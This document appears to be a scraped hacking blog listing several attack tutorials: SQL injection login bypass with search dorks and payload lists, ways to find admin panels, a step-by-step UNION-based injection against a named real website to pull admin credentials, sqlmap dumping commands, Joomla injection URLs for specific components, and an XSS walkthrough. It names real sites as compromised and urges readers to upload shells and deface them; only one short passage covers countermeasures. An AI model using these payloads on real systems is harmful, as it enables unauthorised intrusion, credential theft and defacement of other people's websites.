Demo Of Basic SQL injection for website hacking

You might have seen hackers hacking and defaceing websites, editing it with their own stuff, makeing post on websites etc. There are many methods of doing this, In this tutorial I will be showing you a very basic and simply SQLi (Structured Query Language Injection).  I will show you how to find the websites admin panel using a simple google dork and a SQL query to bypass the admin user name and password and enter into the panel. When you are in the panel just find a upload option and upload your shell, then deface it.

Dorks: inurl:adminlogin.aspx
            inurl:admin/index.php
            inurl:administrator.php
            inurl:administrator.asp
            inurl:login.asp
            inurl:login.aspx
            inurl:login.php
            inurl:admin/index.php
            inurl:adminlogin.aspx

# Try to make your own dorks also to get more success rate.

Hundreds of sites will open up having /adminlogin.aspx in their URL. Select any website, you will get the area from where the admins login. Fill the details as:
User: 1'or'1'='1
Password: 1'or'1'='1

Use the above mentioned login details and you will be into the admin panel of a website. I will not work for all the websites you will find, but will work on most of the website. 

Some websites which I got:
http://gimtech.in/Webadmin/AdminLogin.aspx
http://welkinindiagroup.com/admin/adminlogin.aspx
http://nobinsolutions.com/Adminlogin.aspx



Other InjecTion Queries:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)

Read more ...

Top 7 ways For Finding Admin PAnel OF Any website

Top 7 ways For Finding Admin PAnel OF Any website

I see many peoples having problem while hacking a Website  They say that the Get the Data but they are unable to find the admin panel  So today i will be sharing all the Tricks that are basically done for finding Admin panel Of a Web Site 

Method 1:Adding URL

This is the first and easiest method to find admin login page. You can add some words

after the URL.Like

http://www.site.com/admin
http://www.site.com/administrator
http://www.site.com/login
http://www.site.com/wp-login.php
http://www.site.com/admin.php[/color]

Method 2:[color=#FF0000]Using Various Script

You can use various scripts like various admin finder to get the admin page.
Here I am
showing you an useful scripts which will help you to get the admin page.(I will release my own admin finder script soon and upadte here)
To run this script you first need to install Active Perl.get it from

http://www.activestate.com/activeperl/downloads

Now copy the code of http://pastebin.com/WWZszURW and save it as anything.pl and
run the script to get the login page of the desired site.(Remember its a python Script).

Method 3:Crawling software

You can use various crawling tool to crawl the website and get the login page. These
website crawl all the pages of the website and show the list of all pages and directories.

Method 4:Crawling

By default various search engines crawl the entire site and by using robots.txt the site
owner actually gives the list of links that are not to be crawled by the engine.
Now most
of the time the admin ask the engine not to crawl the admin page so if you view the
robots.txt you can get the link to the login page.
http://www.site.com/robots.txt[/color]

Method 5:[color=#FF4500]Google Dorks

Google dorks are some time very useful if you know to use it properly.so here are some example of useful Google dorks that will definitely help you in finding admin login panle of a website.

Site:site.com “admin”
Site:site.com inurl:login
site:site.com intitle:"admin login"

Method 6:Using Online Admin Finder/Scanner

There are many such online admin finder available but i am giving you the link for one of my favorite one This 
site http://sc0rpion.ir/af/ will help you in finding admin login page online.

Method 7:Havij Tool

At last you can use the all time popular Havij to find admin page.Click on the HAvij Link to know more i have already written a nice post on it.
COUNTERMEASURES BY ADMIN
From this post it becomes very clear that if You (site owners) have not changed the
default URL of your site’s login page then it can easily be compromised if an attacked
gets the User name and password or even he can brute it.So it is advised that you
should change the default URL of yours login page to something uncommon which is
hard to guess like for example:

http://www.site.com/glass.php
http://www.site.com/myway.php

Read more ...

SQL Hacking a Website

SQL Hacking a Website

Website Hacking ~ SQL Injection 

Hello, today I'll be going over the steps of performing an SQL injection attack. I would like to state that I will be using a site I have already performed this attack on for the sake of this tutorial. I am not responsible for how you use what you have learned here, so let's get started.

The site I will be using: http://www.irwinhunter.com.au/

Step 1. The website
Okay so this website has been designed very poorly. It has a constant design color of green and some stupid navigation panel. It has multiple places such as "Products" and "Links". Overall this website is pretty shitty.

[Step 2. Finding the vulnerability
Okay before we actually are able to do this attack we need to find a vulnerability.
To do this we will have to go to pages and click on other pages we find within the main page we clicked on, for this example I'll use "Products". After you are in the "Products" section just click on a product and then we can get into the fun part, I'll be using "Herbs" for this. After you chose your product group such as "Herbs" click on a product within the category and you will be taken to the page for that product. To notice if we have found a vulnerable page in the "Products" section look at the website URL, it should have something like

Code:

products.php?prodid=<number>

If it does then to find out if it is vulnerable we need to put a ' or a fucked up piece of math logic such as 1=0--
If done correctly the URL should look like

Code:

products.php?prodid=<number>' or 1=0--

If the site is vulnerable you should have an error like this.

Code:

Error performing query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1=0--' at line 1

[Step 3. Exploiting the vulnerability
If you got this far you have obviously understood the first 2 steps, now let's move on. Once you have found your vulnerability we can now exploit it in order to get some info that we shouldn't be able to get. First let's start with getting the table names on the page by typing in the following into the website url.

Code:

products.php?prodid=<number> order by 20--

Now for this website it should have came up with an error that says,

Code:

Error performing query: Unknown column '20' in 'order clause'

if it does than we know our number is too big, so let's cut the number in half with 15 and put it into the URL.

Code:

products.php?prodid=<number> order by 15--

Once again we should get the same error but this time the number should be 15. We are now going to drop down 5 more times to 10, if done correctly it should be.

Code:

products.php?prodid=<number> order by 10--

We also get the same error just with the number 10, so why not drop to 5?

Code:

products.php?prodid=<number> order by 5--

Holy shit we no longer have an error!, but we still need to find the max number we can go at in order to do this attack properly. I suggest you increment the number by 1 until you can no longer can view the page and begin to get an error again.

Step 4. Finding the table names
If you have managed to follow all the steps properly you are now able to start getting the table and column names. For this section of the tutorial we will be covering how to get the table names first.

Okay so, to get the name of what is known as in the SQL syntax as a "table" we need to add some more lines of code into the URL bar. The code we will be adding needs to have what we currently have, deleted. After what we currently have we need to insert the following code.

Code:

products.php?prodid=-<number> union select 1,2,3,4,5,6,7--

If done correctly you should see a number on your screen, this shows what number is vulnerable and we can start attacking. If this was not done correctly and you still see words on the screen place a minus sign(-) in front of the product id.

Now to get the table names we need to format the URL string as followed.

Code:

products.php?prodid=-<number> union select 1,2,table_name,4,5,6,7 from information_schema.tables--

If done correctly you should see text such as.

Code:

CHARACTER_SETS

You may now scroll through the tables and see what you would like, I want to get admin login info so I will use the "admin" table I have found.

Step 5. Getting column names
Okay to get the names of what is known in the SQL syntax as a"column" all we need to do is go back to what we need in "Step 4" and just change it with this.

Code:

products.php?prodid=-<number> union select 1,2,column_name,4,5,6,7 from information_schema.columns--

Once this is done you may look through what you want and as I said, I wanted admin login. I will proceed to use the columns "login" and "password".

Step 6. Getting our login info
Okay now to get the login info that we wanted we need to make sure that we wrote down what the info was to get it, if we didn't we need to look again. Now since I wrote the info I needed down I now know that what I need to use is below.

Code:

login, password, admin

Now you may be wondering how do we use what we have obtained, well it's simple. Just follow my instructions and you will have admin info. To get the info we need to take the string we currently have which should be.

Code:

products.php?prodid=-<number> union select 1,2,column_name,4,5,6,7 from information_schema.columns

We need to replace "column_name" and "schema.columns" with "concat(login,0x3a,password" and "admin". Once this is done it should look like this.

Code:

products.php?prodid=-<number> union select 1,2,concat(login,0x3a,password),4,5,6,7 from admin--

If you did this correctly the username and password should show up and if so, this means you have followed this tutorial correctly and have done a SQL injection attack.

Read more ...

SQLmap in BackTrack 5 Tutorial

SQLmap in BackTrack 5 Tutorial

Hello again guyz
today I'm going to show you how to hack SQL Vuln. site with SQLmap in BackTrack 5
first of all of all open BackTrack > Terminal; then type:
cd /pentest/database/sqlmap
hit Enter.
Now we are inside SQLmap, lets start hacking

####################################################################

Now the command we will need here is:

+++++++++++++++++++++++++++++++++++++++++
-D <= define the database
-T <= define the table
-C <= define the column
--dbs <= bring Databases names
--tables <= bring table names
--columns <=bring columns names
--dump <= dump the data out of the column
++++++++++++++++++++++++++++++++++++++++++

###################################################################



Lets start

our first command will be:
./sqlmap.py -u http://www.website.com/index.php?id=13 --dbs <= Example!
it will look like:




then we will get the Databases names like:




now we will ask for tables from any of those databases with --tables
now we have to select the database with "-D" and ask for the tables with "--tables"
so we will type:
./sqlmap.py -u http://www.website.com/index.php?id=13 -D database_name --tables
I choose walnut_live database so I typed:




and the results will be the tables name of course
it will look like:




now we got the tables and found the users table!!
now we will select this table by "-T" command and ofcourse we already selected our database, so now we will write the same command, but we will replace "--tables" and put "-T" table_name which is "users" table and then ask for the columns inside that table by "--columns" command it will be like
./sqlmap.py -u http://www.website.com/index.php?id=13 -D database_name -T table_name --columns
it will look like:


now we will get the results, the columns
they will come like this:


as you can see we got "id, pass, and user" columns
now we want the data from them so we will dump the data with "--dump"
but in this one we have two ways to get them..
we can dump all the data at once, Or select the column and get the data from
I will show you how both of them look like and used..

first we can get all the data by this command:
./sqlmap.py -u http://www.website.com/index.php?id=13 -D database_name -T table_name --dump
which will get us all the data at once and will look like this:




and the result is:




In the picture I marked the user and pass
now we will try getting them one by one with this command:
./sqlmap.py -u http://www.website.com/index.php?id=13 -D database_name -T table_name -C column_name --dump
for example I will get user :

User::



result::


And so on the for the rest of the data.

Read more ...

Joomla SQL Injection Tutorial

Joomla SQL Injection Tutorial

The probably most common case for 

hacked Joomla websites

is that a SQL injection vulnerability was exploited. A typical URL which is affected by this type of vulnerability looks like this:

index.php?option=com_blabla&category=5&Item=2

Typically the following parameters are vulnerable:

- cat, category, kat, categories, kats, cats
- id, userid, katid, catid
- sometimes also Item, entry, page

You can find out if a parameter is vulnerable when you change its value from e.g. 

category=5 to category='

.

Press enter and look for 

MySQL errors

in the website. If you find one, you might have discovered a SQL inkjection vulnerability.

In order to give you a better understanding and feeling of how vulnerable URLs might look like, I just show you some URLs which are known to be vulnerable (I discovered them):

URL:

index.php?option=com_jp_jobs&view=detail&id=1

Vulnerable parameter:

id

URL:

index.php?option=com_mv_restaurantmenumanager&task=menu_display\Venue=XX&mid=XX&Itemid=XX

Vulnerable parameter:

mid

URL:

index.php?option=com_qpersonel&task=qpListele&katid=2

Vulnerable parameter:

katid

URL:

index.php?com_pandafminigames&Itemid=&task=myscores&userid=2

Vulnerable parameter:

userid

URL:

index.php?option=com_joltcard&Itemid=21&task=view&cardID=6

Vulnerable parameter:

cardID

URL:

index.php?com_bfquiztrial&view=bfquiztrial&catid=1&Itemid=62

Vulnerable parameter:

catid

URL:

index.php?com_golfcourseguide&view=golfcourses&cid=1&id=79

Vulnerable parameter:

id

URL:

index.php?option=com_nkc&view=insc&lang=en&gp=10

Vulnerable parameter:

gp

Notice how many parameters look familiar to you? Yes, I mentioned them earlier as well-known parameters which are affected on regular basis :)

Since every Joomla database contains the same struture (like the same tables etc.), we know enough to inject a SQL Statement:

Example #1:

index.php?option=com_qpersonel&task=qpListele&katid=XX+AND+1=2+UNION+\SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(\username, password)--

Example #2:

index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=XX+\AND+1=2+UNION+SELECT+concat(password),2,concat(password),4,5,6,7,\8,9,10,11,12--

Example #3:

index.php?option=com_jp_jobs&view=detail&id=1+AND+1=2+UNION+SELECT+\group_concat(0x503077337220743020743368206330777321,name,username,\password,email,usertype,0x503077337220743020743368206330777321)--

The selected information will be shown within the website.
Select a username and password from the table and try to crack the MD5 Hash with the help of raindbow tables.

SQL injections in Joomla give us so much freedom as we can get. You can select everything you want from the database, and if you are lucky, there are also other tables in the databases which do not belong to Joomla but still contain some very interesting information.

Read more ...

XSS Complete Tutorial Website Hacking

XSS Complete Tutorial Website Hacking

Cross Site Scripting(XSS) Complete Tutorial for Beginners~ Web Application Vulnerability

What is XSS?

Cross Site Scripting also known as XSS, is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users.

In a typical XSS attack, a hacker inject his malicious javascript code in the legitimate website . When a user visit the specially-crafted link , it will execute the malicious javascript. A successfully exploited XSS vulnerability will allow attackers to do phishing attacks, steal accounts and even worms.

Quote:Example :Let us imagine, a hacker has discovered XSS vulnerability in Gmail and inject malicious script. When a user visit the site, it will execute the malicious script. The malicious code can be used to redirect users to fake gmail page or capture cookies. Using this stolen cookies, he can login into your account and change password.

It will be easy to understand XSS , if you have the following prerequisite:

• Strong Knowledge in HTML,javascript(Reference).
• Basic Knowledge in HTTP client-Server Architecure(Reference)
• [optional]Basic Knowledge about server side programming(php,asp,jsp)

XSS Attack:
Step 1: Finding Vulnerable Website
Hackers use google dork for finding the vulnerable sites for instance "?search= or ".php?q= . 1337 target specific sites instead of using google search. If you are going to test your own site, you have to check every page in your site for the vulnerability.

Step 2: Testing the Vulnerability:
First of all, we have to find a input field so that we can inject our own script, for example: search box, username,password or any other input fields.

[url=https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOtE50bWRA13gX0q8KR0ryrxYgUOzXRJ_nEmoYYcggIet3kpjr58AFn2mXt433TFMxf63UeBoll18q48ZHzzosUnrvsUZNCDnamRlKXtL2m3dsv9hns54qSILubjvfq2I0M0esFoakLK4/s1600/search+box.jpg"imageanchor=1][/url]

Test 1 :
Once we found the input field, let us try to put some string inside the field, for instance let me input"BTS". It will display the result .
[url=https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJLmhAlzkKzv-T8H-uDec0g3VBgEwNMeULTEdlg0oh7N6LFy7AICj3MbFVJdd2mvcR4p9d-me5Dt-s4L9EzKz1FwHFH8h_589zApxkOkBmfdM1XtYOGzPKK5EoK8QUukQL3vBdXizjGvE/s1600/XSS_input.gif" imageanchor=1][/url]

Now right click on the page and select view source. search for the string "BTS" which we entered in the input field. Note the location where the input is placed.
[url=https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-owWzXHgLvkOR784x0zKcqLZSxEB6qJqavey0GrjY5GcvjLg8-0IvlGFxpUqkxLNCd0vcvAKRg81etVjAyj58-OXDaQL5mKlPBlKh4hxipB1_0-UNNKsfxyrZKDk_CmaJeUYf3PmuBhY/s1600/BTS_XSS.gif" imageanchor=1][/url]

Test 2:
Now we are going to check whether the server sanitize our input or not. In order to do this , let usinput the &lt;script&gt; tag inside the input field.
[url=https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVX-RJlrVTvktzkOPrho4MfqaVQYbmdG2jjvRHir6_iObEy9XW8dN4E4NXe2MEzicU0cxbHYcvWq3ZvFBIDftkvwPLFxdqzpPiZUXH2EUq9AiTosloa_wMQSJEb19lf7h96prJS-gk_lY/s1600/Xss_script_tag.gif" imageanchor=1][/url]
View the source of the page . Find the location where input displayed place in previous test.
[url=https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-FwMdYMX1c_C2sW1H8mBbOKZgMZ7B_gAE6zdmOadbXhFC1_4exufo_WcEqUAonA0OF6XuzynZe3lUtrcXIprYcNRPaLcrnqm2zs2TQiidTz5m7iWyS7OFoVmK1vZJdDNePUTsBIrs6WA/s1600/xss-SUCCESS_Noparsing.gif" imageanchor=1][/url]

Thank god, our code is not being sanitized by the server and the code is just same as what we entered in the field. If the server sanitize our input, the code may look like this &amp;lt;script&amp;gt;. This indicates that the website vulnerable to XSS attack and we can execute our own scripts .

Step 3: Exploiting the vulnerability
Now we know the site is somewhat vulnerable to XSS attack. But let us make sure whether the site is completely vulnerable to this attack by injecting a full javascript code. 

Code:

For instance, let us input<script>alert('BTS')</script> .

[url=https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu5OQT8wH6LCK4s2QhvgrspSpcf0PDWM9Bsdn_IArLPmaDE0tVrbfJRQX6LF6yIm7DAj-IYFJXRW8TfX6RKQ3WPRtAsb7wV12GxCU7MTH1dKESsz3b5brcK3eobCbuFO9Oj7hw05MQ3AU/s1600/injecting-XSS.gif" imageanchor=1][/url]

Now it will display pop-up box with 'BTS' string. Finally, we successfully exploit the XSS . By extending the code with malicious script, a hacker can do steal cookies or deface the site and more.
[url=https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL9V3dEwtZfYlXVNQkLYdDhfud5jLMb_JTkKal4OOcyqFcPTSKcAluqGVvHzKpd_VNHxSQz0yfbevmg9nH35Pq8avY_l89Ht6MRxpzm0WRgsfICXf2RxmRLU4ERxa36PP8o5mEIhgUK_M/s1600/alert-box-xss.gif" imageanchor=1][/url]

Types of XSS Based on persisting capability:
Based one Persistence capability, we can categorize the XSS attack into two types namely Persistent and Non-Persistent.

Persistent XSS:

The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page.

For Example: 
Many websites host a support forum where registered users can ask their doubts by posting message , which are stored in the database. Let us imagine , An attacker post a message containing malicious javascript code instead. If the server fail to sanitize the input provided, it results in execution of injected script. The code will be executed whenever a user try to read the post. If suppose the injected code is cookie stealing code, then it will steal cookie of users who read the post. Using the cookie, attacker can take control of your account.


Non-Persistent XSS:

Non-Persistent XSS, also referred as Reflected XSS , is the most common type of XSS found now a days. In this type of attack, the injected code will be send to the server via HTTPrequest. The server embedd the input with the html file and return the file(HTTPResponse) to browser. When the browser executes the HTML file, it also execute the embedded script. This kind of XSS vulnerability frequently occur in search fields.

Example:
Let us consider a project hosting website. To find our favorite project, we will just input the related-word in the search box . When searching is finished, it will display a message like this "search results for yourword " . If the server fail to sanitize the input properly, it will results in execution of injected script.

In case of reflected XSS attacks, attacker will send the specially-crafted link to victims and trick them into click the link. When user click the link, the browser will send the injected code to server, the server reflects the attack back to the users' browser. The browser then executes the code .

In addition to these types, there is also third type of attack called DOM Based XSS attack, i will explain about this attack in later posts.

What can an attacker do with this Vulnerability?

• Stealing the Identity and Confidential Data(credit card details).
• Bypassing restriction in websites.
• Session Hijacking(Stealing session)
• Malware Attack
• Website Defacement
• Denial of Service attacks(Dos)

Read more ...